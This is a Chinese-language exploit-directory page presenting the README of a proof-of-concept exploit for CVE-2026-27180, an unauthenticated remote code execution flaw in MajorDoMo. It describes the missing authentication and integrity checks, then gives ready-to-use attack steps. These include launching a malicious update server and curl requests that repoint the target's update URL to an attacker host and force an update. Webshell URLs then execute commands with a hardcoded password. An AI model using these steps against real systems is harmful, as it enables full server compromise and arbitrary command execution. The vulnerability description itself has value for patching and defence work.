Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mbanyamer/cve-2026-27180-majordomo-unauthenticated-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubmbanyamer/cve-2026-27180-majordomo-unauthenticated-rce

CVE-2026-27180-MajorDoMo-unauthenticated-RCE

CVE-2026-27180 的概念验证漏洞利用程序,通过更新 URL 投毒在 MajorDoMo 中实现未认证远程代码执行(RCE),将 WebShell 投递至 Web 根目录。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MajorDoMo RCE (CVE-2026-27180)

Author Python License: MIT CVE-2026-27180 Exploit Type

MajorDoMo 中通过更新 URL 投毒实现未认证远程代码执行

CWE-494 – 下载无完整性校验的代码
影响:通过放置在 Web 根目录的 webshell 实现服务器完全沦陷
认证要求:无
补丁:PR #1177

📜 描述

本仓库包含针对 CVE-2026-27180 的概念验证漏洞利用程序——这是 MajorDoMo 智能家居自动化软件中的一个严重未认证远程代码执行漏洞。

攻击者可以:

  • 在无需认证的情况下投毒更新源 URL
  • 强制触发更新,下载并解压恶意 tarball
  • 将任意 PHP 文件(包括 webshell)直接放置到 Web 根目录

该漏洞存在的原因:

  • auto_update_settings 和 force_update 模式没有认证检查
  • 没有 TLS 证书校验(CURLOPT_SSL_VERIFYPEER = false)
  • 下载的更新包没有签名/完整性校验
  • 解压后的文件被递归复制到文档根目录

🛠️ 功能特性

  • 一体化 Python 脚本(无需外部文件)
  • 恶意 Atom feed + tarball 在内存中生成
  • 受密码保护的多方法 webshell(poc.php)
  • 可选的 .htaccess 用于强制 PHP 执行
  • 简洁的控制台输出,附带可直接复制粘贴的命令

🚀 安装

root@kitploit:~
git clone https://github.com/YOUR-USERNAME/majordomo-cve-2026-27180-exploit.git
cd majordomo-cve-2026-27180-exploit
# 无需 pip install – 仅使用标准库 + argparse

📊 PoC 攻击流程

root@kitploit:~
graph TD
    A["攻击者启动恶意 HTTP 服务器\n提供 /master.xml + /archive/master.tar.gz"] --> B["攻击者投毒更新 URL\n通过 GET /objects/?module=saverestore&mode=auto_update_settings\n&set_update_url=http://attacker:8080"]
    B --> C["攻击者触发更新\nGET /objects/?module=saverestore&mode=force_update"]
    C --> D["MajorDoMo 获取被投毒的 Atom feed"]
    D --> E["下载恶意 master.tar.gz\n(CURLOPT_SSL_VERIFYPEER=false)"]
    E --> F["使用 tar xzvf ... 解压 tar.gz"]
    F --> G["copyTree() 递归复制文件\n→ poc.php 和 .htaccess 落入 Web 根目录"]
    G --> H["攻击者访问 webshell\nhttp://target/poc.php?pass=ChangeMe123&cmd=id"]

    style A fill:#f9d5e5,stroke:#333,stroke-width:2px
    style H fill:#c3e6cb,stroke:#333,stroke-width:2px

🖥️ 使用方法

启动恶意服务器:

root@kitploit:~
python3 exploit.py http://192.168.1.50:80 --lhost 192.168.1.100 --lport 8080

服务器启动后,针对目标运行以下命令:

root@kitploit:~
# 1. 投毒更新源
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://192.168.1.100:8080'

# 2. 触发强制更新
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=force_update'

等待 10–90 秒,然后测试 webshell:

root@kitploit:~
# 示例:
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=id
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=whoami
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=uname%20-a

⚠️ 法律与道德声明

本代码严格仅供教育目的、授权安全测试和红队活动使用。

  • 请勿 NOT 对您不拥有或未经明确书面许可的系统使用此漏洞利用程序。
  • 未经授权的使用可能违反法律,包括《计算机欺诈和滥用法》(CFAA)及全球范围内的等效法律。
  • 作者对本代码造成的任何滥用或损害概不负责。

📄 许可证

MIT 许可证

版权所有 © 2026 Mohammed Idrees Banyamer

特此免费授予任何获得本软件及相关文档文件(“软件”)副本的人无限制地处理本软件的权利,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或出售软件副本的权利,并允许向其提供本软件的人员这样做,但须满足以下条件:

上述版权声明和本许可声明应包含在本软件的所有副本或实质性部分中。

本软件按“原样”提供,不作任何明示或暗示的保证,包括但不限于适销性、特定用途适用性和非侵权性的保证。在任何情况下,作者或版权持有人均不对任何索赔、损害或其他责任负责,无论是在合同诉讼、侵权或其他诉讼中,由本软件或本软件的使用或其他交易引起、产生或与之相关的。

下载工具